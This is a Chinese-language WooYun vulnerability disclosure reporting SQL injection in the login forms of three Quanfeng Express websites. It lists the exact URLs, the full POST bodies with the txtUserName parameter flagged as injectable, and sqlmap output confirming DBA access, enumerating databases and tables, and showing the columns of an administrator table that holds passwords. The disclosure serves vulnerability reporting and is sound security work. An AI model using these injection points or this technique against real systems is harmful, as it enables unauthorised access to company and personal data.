当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0124791

漏洞标题:全峰快递多个站点同一注入点打包(DBA权限敏感信息泄露)

相关厂商:全峰快递

漏洞作者: 路人甲

提交时间:2015-07-07 19:32

修复时间:2015-08-21 19:32

公开时间:2015-08-21 19:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-07: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-08-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT,多个站点同一sql注入打包,求20RANK

详细说明:

主站一处,另外两个分站oa,qfoa注入点一样dba权限,大量信息泄露

sql注入点
http://www.qfkd.com.cn/setqfkd/login.aspx
post参数
btnSubmit=%e7%99%bb%20%e5%bd%95&cbRememberId=on&txtSiteName=cmfqiinu&txtUserName=*&txtUserPwd=cmfqiinu&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEdAAeuMCuiFSDyGSpN8aumMCzZlqw4%2bHUh4pFtXZG1uj7YSWN6ZYJNGAQHn0c9zMgZU3BORaObvDZq7XZGthlawnrNPOaW1pQztoQA36D1w/%2bbXfDem/Xjh1w3F3/5Hz3uXoNOhguM/3tJm9vMkUsFT8mn&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE5NDExNDI2MDcPZBYCAgEPZBYGAgEPFgIeB1Zpc2libGVnZAIHDw8WBB4EVGV4dAUV6K%2b36L6T5YWl56uZ54K55ZCN56ewHwBnZGQCCw8QDxYCHgdDaGVja2VkZ2RkZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFDWNiUmVtZW1iZXJJZDIFDGNiUmVtZW1iZXJJZA%3d%3d
txtUserName参数存在注入


oa分站注入

http://oa.qfkd.com.cn/setqfkd/login.aspx
post参数
btnSubmit=%e7%99%bb%20%e5%bd%95&cbRememberId=on&txtSiteName=vtpvrdcv&txtUserName=*&txtUserPwd=vtpvrdcv&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEdAAeuMCuiFSDyGSpN8aumMCzZlqw4%2bHUh4pFtXZG1uj7YSWN6ZYJNGAQHn0c9zMgZU3BORaObvDZq7XZGthlawnrNPOaW1pQztoQA36D1w/%2bbXfDem/Xjh1w3F3/5Hz3uXoNOhguM/3tJm9vMkUsFT8mn&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE5NDExNDI2MDcPZBYCAgEPZBYGAgEPFgIeB1Zpc2libGVnZAIHDw8WBB4EVGV4dAUV6K%2b36L6T5YWl56uZ54K55ZCN56ewHwBnZGQCCw8QDxYCHgdDaGVja2VkZ2RkZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFDWNiUmVtZW1iZXJJZDIFDGNiUmVtZW1iZXJJZA%3d%3d
存在注入的参数txtUserName


qfoa站点

http://qfoa.qfkd.com.cn/setqfkd/login.aspx
post参数
btnSubmit=%e7%99%bb%20%e5%bd%95&cbRememberId=on&txtUserName=*&txtUserPwd=iumhjsuw&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEdAAZPoml5tC2dbv7RgYErGW9VY3plgk0YBAefRz3MyBlTcE5Fo5u8Nmrtdka2GVrCes085pbWlDO2hADfoPXD/5td8N6b9eOHXDcXf/kfPe5eg06GC4z/e0mb28yRSwVPyac%3d&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE5NDExNDI2MDcPZBYCAgEPZBYCAgEPFgIeB1Zpc2libGVoZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUNY2JSZW1lbWJlcklkMgUMY2JSZW1lbWJlcklk
txtUserName参数存在注入


漏洞证明:

oa1.jpg


部分数据证明,就不一一列举了
current user:    'qfoa'
current database:    'qfoadb2'
current user is DBA:    True
available databases [14]:
[*] ccflow5
[*] DBSynchronous
[*] master
[*] model
[*] msdb
[*] PrintDB
[*] qfhy
[*] qfkd_back
[*] qfoadb2
[*] ReportServer
[*] ReportServerTempDB
[*] SinglePrint
[*] tempdb
[*] ZYSite
Database: qfoadb2
[129 tables]
+----------------------------+
| FB_manager                 |
| FB_manager_log             |
| FB_search_shanghai         |
| FB_shanghai_adress         |
| FB_shanghai_no_resoult     |
| FB_shanghai_resoult        |
| FB_site                    |
| FB_site_address            |
| SP_Customer                |
| SP_SingleLog               |
| TestTable                  |
| View_BaoXianLiPei          |
| View_article_mend          |
| View_diaocha               |
| View_gzjindu               |
| View_jiabanche             |
| FB_diqu-biao               |
| areas                      |
| bill_tbdd                  |
| dt_BaQiang_FuFei           |
| dt_BaQiang_IT              |
| dt_BaQiang_JiChu           |
| dt_BaQiang_ShouFei         |
| dt_BaQiang_SongXiu         |
| dt_BaQiang_TuiHui          |
| dt_BaQiang_ZhanDian        |
| dt_BaoXianLiPei            |
| dt_BaoXianLiPei_ChuLi      |
| dt_BaoXianLiPei_ShenHe     |
| dt_BaoXianLiPei_attach     |
| dt_K8_FaJian               |
| dt_K8_PaiJian              |
| dt_K8_ZhongLiang           |
| dt_Recruitment             |
| dt_RecruitmentDetails      |
| dt_amount_log              |
| dt_article                 |
| dt_article_albums          |
| dt_article_beizhu          |
| dt_article_comment         |
| dt_article_content         |
| dt_article_download        |
| dt_article_goods           |
| dt_article_mend            |
| dt_article_news            |
| dt_article_tit             |
| dt_attribute_value         |
| dt_attributes              |
| dt_baobiao_tongji          |
| dt_category                |
| dt_danpo                   |
| dt_danpo_news              |
| dt_danwu                   |
| dt_danwu_news              |
| dt_danyi                   |
| dt_danyi_news              |
| dt_dcmingxi                |
| dt_dczong                  |
| dt_distribution            |
| dt_download_attach         |
| dt_goods_group_price       |
| dt_gzjindu                 |
| dt_jiabanche_genzong       |
| dt_jiabanchedengji         |
| dt_jiabanchejichu          |
| dt_jiekuan_attach          |
| dt_jiekuan_duiwai          |
| dt_jiekuan_fuzeren         |
| dt_jiekuan_geren           |
| dt_jiekuan_gongsi          |
| dt_jiekuan_jingying        |
| dt_jiekuan_shengming       |
| dt_jiekuan_shenqing        |
| dt_jiekuan_tuijian         |
| dt_jiekuan_tuotou          |
| dt_jiekuan_tuotouS         |
| dt_jiekuan_tuotouY         |
| dt_jiekuan_wangdian        |
| dt_jiekuan_xinyong         |
| dt_jiekuan_yue             |
| dt_jindu_content           |
| dt_khjichu                 |
| dt_kpjichu                 |
| dt_kpmingxi                |
| dt_kpzong                  |
| dt_loginlog                |
| dt_mail_template           |
| dt_manager                 |
| dt_manager_log             |
| dt_manager_role            |
| dt_manager_role_type       |
| dt_manager_role_type_value |
| dt_manager_role_value      |
| dt_manager_value           |
| dt_nbtszdwh                |
| dt_pqjlwh                  |
| dt_price                   |
| dt_qiandao_fx              |
| dt_qiandao_fxls            |
| dt_qiandao_hy              |
| dt_qiandao_ry              |
| dt_qiandao_ryls            |
| dt_read                    |
| dt_rypingfen               |
| dt_saixuan                 |
| dt_sys_channel             |
| dt_sys_model               |
| dt_sys_model_nav           |
| dt_tousujianyi             |
| dt_urllogin                |
| dt_web                     |
| dt_web_content             |
| dt_web_news                |
| dt_zdpingfen               |
| dt_zhiwei                  |
| sqlmapoutput               |
| sysdiagrams                |
| view_P2P_jiekuan           |
| view_article_content       |
| view_article_download      |
| view_article_goods         |
| view_article_news          |
| view_danpo_news            |
| view_danwu_news            |
| view_danyi_news            |
| view_qiandao_tuifang       |
| view_sys_channel           |
| view_web_content           |
| view_web_news              |
+----------------------------+
Database: qfoadb2
Table: dt_manager
[18 columns]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| add_time    | datetime |
| Answer      | nvarchar |
| category_id | int      |
| email       | nvarchar |
| id          | int      |
| is_lock     | int      |
| k8username  | nvarchar |
| Question    | nvarchar |
| real_name   | nvarchar |
| remark      | nvarchar |
| role_id     | nvarchar |
| role_type   | int      |
| SID         | nvarchar |
| telephone   | nvarchar |
| user_name   | nvarchar |
| user_pwd    | nvarchar |
| wangdian    | nvarchar |
| zhiwei      | int      |
+-------------+----------+


oa2.jpg


oa3.jpg


oa4.jpg

修复方案:

参数过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论

  1. 2015-07-07 21:53 | hh2014 ( 普通白帽子 | Rank:225 漏洞数:39 | 继续)

    WooYun: 全峰快递某内部关键系统处POST注入 这个交给第三方合作机构(cncert国家互联网应急中心)处理,这个为啥不给互联网应急中心呢 @疯狗 @浩天